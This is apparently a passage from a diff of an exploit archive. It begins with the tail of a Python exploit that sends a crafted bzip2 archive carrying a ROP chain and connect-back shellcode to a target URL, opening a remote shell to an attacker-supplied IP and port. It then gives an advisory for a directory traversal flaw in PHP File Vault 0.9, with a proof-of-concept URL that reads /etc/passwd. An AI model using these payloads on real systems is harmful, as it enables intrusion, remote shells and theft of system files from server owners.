pack("<Q", 0x08029731b7),
"%(shellcode)s",
"%(pad)s",
# 0x45de9c: pop rsp
# 0x45de9d: ret
pack("<Q", 0x45de9c),
pack("<Q", 0x0802973167),
]
def get_payload(ip, port):
sc = "".join(shellcode) % {
"ip": socket.inet_aton(ip),
"port": pack("!H", port)
}
return "".join(payload) % {
"shellcode": sc,
"pad": "\x90" * (4433 - len(sc)),
}
def get_header():
b = bitstring.BitArray()
b.append("0x425a") # magic
b.append("0x68") # huffman
b.append("0x31") # block size (0x31 <= s <= 0x39)
b.append("0x314159265359") # compressed magic
b.append("0x11223344") # crc
b.append("0b0") # not randomized
b.append("0x000000") # pointer into BWT
b.append("0b0000000000000001") # mapping table 1
b.append("0b0000000000000001") # mapping table 2
b.append("0b110") # number of Huffman groups (1 <= n <= 6)
b.append(format(len(selectors), "#017b")) # number of selectors
# selector list
for s in selectors:
b.append("0b" + "1" * s + "0")
# BZ_X_CODING_1 (1 <= n <= 20). we want a fail to make
# BZ2_decompress() bail as early as possible into the
# first gadget since the stack will be kind of messed up
b.append("0b00000")
return b.tobytes()
def send_bzip2(url, bzip2):
try:
req = requests.post(url, files={"file": bzip2}, timeout=5)
except requests.exceptions.Timeout:
return 0
return req.status_code
def get_args():
p = argparse.ArgumentParser()
p.add_argument("--ip", required=True, help="connect-back ip")
p.add_argument("--port", required=True, type=int, help="connect-back port")
p.add_argument("--attempts", type=int, default=10)
p.add_argument("url")
return p.parse_args()
def main():
args = get_args()
bzip2 = get_header() + get_payload(args.ip, args.port)
for i in range(args.attempts):
print("[*] sending archive to %s (%d)" % (args.url, i))
status = send_bzip2(args.url, bzip2)
if status == 0:
break
elif status == 404:
exit("[-] 404: %s" % args.url)
if __name__ == "__main__":
main()

65
platforms/php/webapps/40163.txt Executable file
View file

@ -0,0 +1,65 @@
PHP File Vault version 0.9 , remote directory traversal and read file vulnerabilty
==================================================================================
Discovered by N_A, N_A[at]tutanota.com
======================================
Description
===========
A very small PHP website application which stores anonymously uploaded files and retrieves them by SHA1 hash (a fingerprint of the file which is provided after uploading). Developed for anonysource.org , a kanux project.
https://sourceforge.net/projects/php-file-vault
Vulnerability
=============
The vulnerability exists within the fileinfo.php file of the package:
A A A if (empty($_GET['sha1'])) die("sha1 is required to get file info");
A A A $sha1 = trim($_GET['sha1']);
the 'sha1' variable is requested via the GET method. It is passed as a variable to the 'parseFileInfo' function. This function incorporates a call to
the fopen() function within PHP:
A A A A A A function parseFileInfo($fi) {
A A A A A A $fh = fopen($fi,'r');
A A A A A A $fname = trim(fgets($fh));
A A A A A A fclose($fh);
A A A A A A return array($fname);
A A A A A }
The parseFileInfo() function is called within the file fileinfo.php with the 'sha1' variable inside:
A A A A A A if (!is_readable(FI.$sha1)) die("cannot read file info!");
A A A A A A list($fname) = parseFileInfo(FI.$sha1);
A A A A A A readfile('head.html');
A A A A A A if ($fname) echo "<h1><a href=\"/$sha1\">$fname</a></h1>";
This is the vulnerability that allows parts of *any world readable* file to be read by a remote attacker.
Attacks can include gathering sensitive information, .bash_history, .rhosts, /etc/passwd and so on.
Proof Of Concept
================
PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd